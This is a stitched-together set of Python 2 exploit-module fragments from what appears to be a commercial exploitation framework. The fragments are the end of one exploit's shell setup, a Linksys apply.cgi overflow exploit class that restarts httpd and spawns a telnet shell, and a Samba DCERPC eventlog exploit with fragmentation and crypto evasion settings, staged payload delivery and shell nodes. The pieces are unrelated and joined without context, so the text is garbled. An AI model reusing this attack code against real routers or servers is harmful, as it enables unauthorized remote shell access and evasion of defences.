telnetshell.sock = s2 try: shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction, simpleShell=1) except: self.log("WP> Shell listener failed - connection closed") self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0 node = unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port)) return node
class theexploit(tcpexploit, linksysapplycgiExploit): def __init__(self): tcpexploit.__init__(self) self.port = 80 self.setHost("") self.setVersion(1) #self.method=1 self.cmdline = 0 self.setInfo(DESCRIPTION) return def run(self): self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port)) self.INFO, self.retaddr, self.ovfsize = targets[self.version] return self.dorun() def dorun(self): linksysapplycgiExploit.__init__(self, self.host, self.port) self.sock = self.attack() if not self.sock: self.log("exploitation failed") return 0 self.setInfo("%s %s:%d successfully exploited!" % (NAME, self.host, self.port)) self.t = Telnet() self.t.sock = self.sock self.log("restarting httpd...") self.t.write("/usr/sbin/httpd;/sbin/check_ps >/dev/null 2>&1;\n") if self.cmdline: self.proxy() return try: shell = shelllistener(shellfromtelnet(self.t), logfunction=self.logfunction, simpleShell=1) except: self.log( "Could not make a shell listener - connection was closed. Exploit most likely failed." ) self.setProgress(-1) return 0 node = unixShellNode.unixShellNode() node.parentnode = self.argsDict["passednodes"][0] node.shell = shell return node def displayVersions(self): for a in range(0, len(targets)): print "%d : %s" % (a, targets[a][0]) return def usage(self): print "Usage: " + sys.argv[0] + " -t target [ -p 80] [-s ssl]" self.displayVersions()
def run(self): self.get_args() self.host = self.target.interface if self.version not in VERSIONS: self.log('### Error: no such version') return None desc, stage0, stage1, shell_type = VERSIONS[self.version] self.log('Attacking %s:%s using: %s' % (self.host, self.port, desc)) if self.covertness >= 2: self.log( "DCERPC crypto enabled, set covertness to 1 and try again if exploit fails!" ) self.privacy = True if self.covertness >= 5 and self.covertness < 11: self.log('Crypto + moderate SMB fragmentation') self.frag_level = 1 elif self.covertness == 11: self.log('Crypto + MAX fragmentation (VERY SLOW)') self.frag_level = 2 try: x = Samba(self.host, privacy=self.privacy, payload=stage0, frag_level=self.frag_level) if self.debug == True: self.log('### Attach ...') sys.stdin.read(1) self.log('### Computer Hacking: %s' % self.host) s, resp = x.ndr_push_eventlog_reportevent() if 'JINX' in resp: self.log('### Succesfully Hacked Computer!') self.log('### Staging to stage1 payload, version: %s' % desc) s.send('JINX') s.send(struct.pack('<L', len(stage1)) + stage1) if shell_type == 'shell': tn = Telnet() tn.sock = s node = unixShellNode.unixShellNode() node.parentnode = self.argsDict['passednodes'][0] node.shell = shelllistener(shellfromtelnet(tn), simpleShell=1) return node if shell_type == 'mosdef': node = linuxNode() node.parentnode = self.argsDict['passednodes'][0] shellServer = MosdefShellServer('Linux', 'i386') shellServer(s, node) node.startup() return node else: self.log('### Failed ... version < 3.4.x or NX enabled ?') except XError, e: self.log('### Fatal Exploit Error: %s' % e)